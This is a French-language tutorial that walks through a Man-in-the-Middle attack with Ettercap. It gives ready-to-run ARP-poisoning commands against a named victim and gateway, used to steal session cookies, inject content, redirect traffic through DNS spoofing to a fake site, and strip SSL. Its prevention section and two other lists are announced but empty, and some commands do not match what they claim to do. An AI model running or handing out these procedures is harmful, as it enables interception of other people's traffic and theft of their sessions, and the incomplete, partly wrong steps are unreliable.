Introduction

Ce tutoriel explique comment effectuer une attaque Man-in-the-Middle (MITM) en utilisant l'outil Ettercap. L'objectif d'une attaque MITM est d'intercepter et de manipuler le trafic réseau entre deux parties. Nous verrons comment configurer et lancer une attaque MITM, ainsi que des exemples concrets et des techniques avancées.

Étape 1: Comprendre les Attaques MITM

Les attaques MITM permettent à un attaquant d'intercepter et de manipuler les communications entre deux parties sans qu'elles en soient conscientes. Cela peut permettre de voler des informations sensibles, d'injecter du code malveillant, ou de rediriger les victimes vers des sites frauduleux. Voici les étapes générales d'une attaque MITM :

Étape 2: Installation d'Ettercap

Ettercap est un outil open-source utilisé pour les attaques MITM. Voici comment l'installer :

sudo apt-get update && sudo apt-get upgrade
sudo apt-get install ettercap-graphical

Étape 3: Configuration d'Ettercap

Une fois Ettercap installé, configurez-le pour lancer une attaque MITM :

Exemple de configuration :

Interface: eth0
Cible 1: 192.168.1.5 (Victime)
Cible 2: 192.168.1.1 (Passerelle)

Étape 4: Lancer l'Attaque MITM

Une fois configuré, démarrez l'attaque en cliquant sur "Start" dans le menu principal. Ettercap commencera à intercepter et à manipuler le trafic entre les cibles.

Exemples Pratiques

Voici trois exemples pratiques pour illustrer l'utilisation d'Ettercap dans des scénarios d'attaque MITM :

Exemple 1: Vol de Cookies de Session

Interceptez les cookies de session d'une victime en surveillant le trafic HTTP non sécurisé :

sudo ettercap -T -q -i eth0 -M arp:remote /192.168.1.5// /192.168.1.1//

Analysez les paquets interceptés pour extraire les cookies de session :

sudo wireshark

Exemple 2: Injection de Code HTML Malveillant

Injectez du code HTML malveillant dans les pages web visitées par la victime :

sudo ettercap -T -q -i eth0 -M arp:remote /192.168.1.5// /192.168.1.1// -P dns_spoof

Utilisez un plugin DNS spoofing pour rediriger la victime vers une page contenant du code HTML malveillant.

Exemple 3: Redirection du Trafic vers un Faux Site Web

Redirigez le trafic de la victime vers un site web frauduleux en utilisant le plugin dns_spoof :

sudo ettercap -T -q -i eth0 -M arp:remote /192.168.1.5// /192.168.1.1// -P dns_spoof

Modifiez le fichier /etc/ettercap/etter.dns pour rediriger les requêtes DNS :

*.example.com A 192.168.1.100

où 192.168.1.100 est l'adresse IP du site web frauduleux.

Techniques Avancées d'Exploitation MITM

Pour rendre l'attaque plus efficace, vous pouvez utiliser des techniques avancées telles que :

Exemple de SSL Stripping :

sudo ettercap -T -q -i eth0 -M arp:remote /192.168.1.5// /192.168.1.1// -P sslstrip

Mesures de Prévention

Pour se protéger contre les attaques MITM, envisagez les mesures suivantes :

Conclusion

Ce tutoriel vous a montré comment effectuer une attaque Man-in-the-Middle (MITM) en utilisant Ettercap. Rappelez-vous, ces informations doivent être utilisées de manière éthique et légale. L'objectif est de sensibiliser aux dangers des attaques MITM et de renforcer la sécurité des réseaux.